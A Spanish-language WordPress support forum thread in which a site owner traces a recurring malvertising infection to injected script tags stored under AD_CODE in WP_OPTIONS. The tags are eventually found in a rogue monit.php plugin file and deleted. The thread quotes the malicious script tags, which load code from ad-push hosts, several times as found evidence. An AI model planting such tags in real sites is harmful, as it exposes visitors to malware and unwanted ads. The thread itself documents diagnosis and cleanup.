• Resuelto edugimeno

    (@edugimeno)


    Buenas!!
    Parece que un sitio web que administro, desde hace tiempo, tiene problemas de malware. Con algunos ordeandores/navegadores lo detecta, con otros no. En algunos simplemente sale publicidad. En otros, el antivirus (Eset) detecta malware srcinject.b
    Cuando lo paso por un scanner web, me dice que encuentra este código:

    <script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>

    Me he bajado todos los ficheros por FTP y los he escaneado, y nada.
    Luego he pensado que podría estar en la base de datos. He hecho un export completo, y efectivamente me encuentro en la WP_OPTIONS, que aparece esta linea:
    ID 39597, AD_CODE,
    <script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>
    <script src=»https://pushsar.com/pfe/current/tag.min.js?z=3260077″ data-cfasync=»false» async></script>
    <script type=»text/javascript» src=»//inpagepush.com/400/3324386″ data-cfasync=»false» async=»async»></script>

    Borro el contenido del option_value, lo recargo y sigue vacio, pern en cuanto vuelvo a navegar por la web, reaparece ese contenido de nuevo en WP_OPTIONS…

    Por otro lado, cuando instalé el plugin font-icons-loader, el antivirus del servidor me detectó malware en ese plugin, en el fichero wp-font-icons-loader.php, pero yo nunca vi dentro de ese fichero nada malicioso. En cambio, ahora me meto a verlo, y en otro fichero que hay justo junto a ese, el class.plugin-modules.php, si que veo que está plagadito de malware y generadores de ads. Lo renombro a php2, y nada, que se sigue regenerando la opcion de WP_OPTIONS…

    Ya no sé me ocurre que hacer, alguien alguna idea? No puedo eliminar ese plugin, es necesario para mostrar los iconos que hay dentro de los bloques de WP_Bakery (VC) en los que se basa la mayoría de la web. He buscado fuentes alternativas de ese plugin, y sin exito…

    Muchas gracias

    La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 4 respuestas - de la 1 a la 4 (de un total de 4)
  • Moderador jose64

    (@jose64)

    Hola

    El plugin que comentas pudo ser la puerta de entrada, el visitante ya está dentro y tendrás que, además de sacarlo, cerrarle esa puerta y las ventanas que pudiese dejar abiertas para entrar nuevamente.

    Primeramente sigue uno por uno todos los pasos de esta guía: Limpiar un WordPress infectado/hackeado. Una vez que tengas una versión limpia y actualizada podrás volver a subir todo al servidor pero claro, el plugin que indicas, Font icons loader for WordPress no tiene soporte ni mantenimiento, o bien lo reemplazas por otro o te encargas tú de actualizarlo. En eso no podemos ayudarte debido a que es un plugin comercial, igual que WPBakery Page Builder for WordPress

    Iniciador del debate edugimeno

    (@edugimeno)

    Ok pero no hay manera de «auditar» la aplicación y conocer qué plugin o página o segmento de código se está ejecutando en el momento que vuelve a insertarse el «ad_code=……» en WP_OPTIONS para ir directo a él?
    Ya he hecho una gran parte de lo indicado en la guia que comentas pero hay muchas acciones que no es tan fácil de seguir en según qué páginas.
    No es que me estén atacando la web cada minuto, es que ya hay algo de código dentro que cada vez que se ejecuta (cuando alguien recarga la página), se re-crea la entrada en BD que activa los anuncios… Es, por ahora, ahí donde quiero atacar. Luego ya cerrar puertas

    Gracias

    Moderador jose64

    (@jose64)

    Te repito lo anterior, si quieres limpiarlo tu mismo sigue la guía paso a paso

    Iniciador del debate edugimeno

    (@edugimeno)

    El problema es que la web no la he construido yo ni tengo backup de antes de la inefccion y no sé hasta qué punto es seguro todo el proceso que viene ahí.
    De cualquier manera, creo que lo tengo.

    (Por si a alguien le ha pasado lo mismo y llega aqui por este malware):
    En wp-content/plugins había un fichero monit.php que definitivamente tenía el código malicioso:

    […]
    $ad_code=’
    <script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>
    <script src=»https://pushsar.com/pfe/current/tag.min.js?z=3260077″ data-cfasync=»false» async></script>
    <script type=»text/javascript» src=»//inpagepush.com/400/3324386″ data-cfasync=»false» async=»async»></script>
    ‘;
    {…}
    Además había un fichero admin_ips.txt que asumo que es desde qué IP’s se permite administrar remotamente este script
    He borrado ambos y he borrado la entrada con «option_name=AD_CODE» de WP_OPTIONS

    A partir de ahí he recargado la página varias veces y el AD_CODE no ha vuelto a aparecer.
    Además he vuelto a escanear la web con los servicios online que antes me daban «malware» y ya me da «limpio».
    Sé que puede haber quedado una puerta abierta a posibles inyecciones futuras, estaré pendiente, pero al menos ahora mismo está limpio, y ya tengo alguna pista.

    Saludos

Viendo 4 respuestas - de la 1 a la 4 (de un total de 4)
  • El debate ‘Malware detectado (y Ads)’ está cerrado a nuevas respuestas.